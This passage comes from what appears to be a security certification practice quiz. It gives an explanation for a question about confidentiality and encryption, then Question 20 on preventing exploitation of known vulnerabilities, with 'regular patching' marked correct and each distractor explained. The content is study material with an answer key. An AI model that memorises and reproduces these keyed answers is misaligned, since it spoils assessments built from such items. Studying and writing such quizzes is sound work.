Confidentiality ensures that information remains protected from unauthorized access and cannot be read without proper decryption keys. Encryption is a fundamental mechanism to achieve confidentiality, transforming plaintext into ciphertext that is unreadable without the key. This ensures that even if intercepted, sensitive data cannot be interpreted by attackers. Confidentiality is one of the core principles of information security and applies to data at rest, in transit, or in use. Strong encryption algorithms, proper key management, and secure protocols are essential to maintain confidentiality.
Integrity focuses on ensuring that data is not altered, tampered with, or corrupted during transmission or storage. Hashing algorithms and digital signatures are common techniques to verify integrity. While integrity is critical for trustworthiness, it does not address the reversibility of encrypted data or prevent unauthorized reading of the information.
Non-repudiation provides proof that a specific action, such as sending a message, cannot be denied by the originator. Digital signatures and cryptographic certificates are used to achieve non-repudiation. While important for accountability, non-repudiation does not prevent someone from decrypting data without a key.
Availability ensures that systems and information are accessible when needed. It focuses on uptime, redundancy, and fault tolerance rather than protecting data from unauthorized access or ensuring secrecy.
Confidentiality is directly related to the principle that encrypted data should remain unreadable without the appropriate key. Encryption mechanisms like AES or RSA rely on cryptographic keys to transform and restore information. Without the key, decryption is computationally infeasible, preserving the secrecy of the information. Other characteristics like integrity, non-repudiation, and availability support security but do not enforce unreadability.
In conclusion, confidentiality ensures that encrypted data cannot be reversed or accessed without the key, making A the correct answer.
Question 20:
Which practice is most effective for preventing attackers from exploiting known software vulnerabilities?
A) Regular patching and updates
B) Enforcing strong password policies
C) Conducting phishing awareness training
D) Deploying VPN solutions
Answer: A) Regular patching and updates
Explanation:
Regular patching and updates are critical for maintaining a secure IT environment. Software vulnerabilities are frequently discovered in operating systems, applications, and network devices. When vendors release patches, they correct security flaws, fix bugs, and close potential entry points for attackers. Applying these updates promptly reduces the attack surface and prevents attackers from exploiting known vulnerabilities. Patch management processes, including prioritization, testing, and deployment, are essential for ensuring that systems remain up to date and secure against active threats.
Enforcing strong password policies helps protect accounts from brute-force attacks, credential guessing, and some forms of unauthorized access. While important for account security, password policies do not address the exploitation of software vulnerabilities or unpatched systems. They are a preventive control for authentication rather than software flaws.
Conducting phishing awareness training educates users about social engineering and reduces the likelihood of credential theft. While beneficial for overall security awareness, training does not prevent exploitation of software vulnerabilities or system-level weaknesses. It focuses on human behavior rather than technical patch management.
Deploying VPN solutions provides encrypted communications and secure remote access. VPNs protect data in transit and provide a secure tunnel but do not fix vulnerabilities within the software itself. VPNs reduce exposure during communication but do not patch flaws or prevent exploitation of unpatched systems.
Regular patching and updates directly address the underlying cause of software exploitation. By keeping systems current with vendor releases, organizations eliminate known vulnerabilities before attackers can take advantage of them. This is a proactive, preventive security measure, whereas password policies, awareness training, and VPN deployment support complementary aspects of security.
In conclusion, regular patching and updates are the most effective practice to prevent exploitation of known software vulnerabilities, making A the correct answer.
Popular posts
Recent Posts
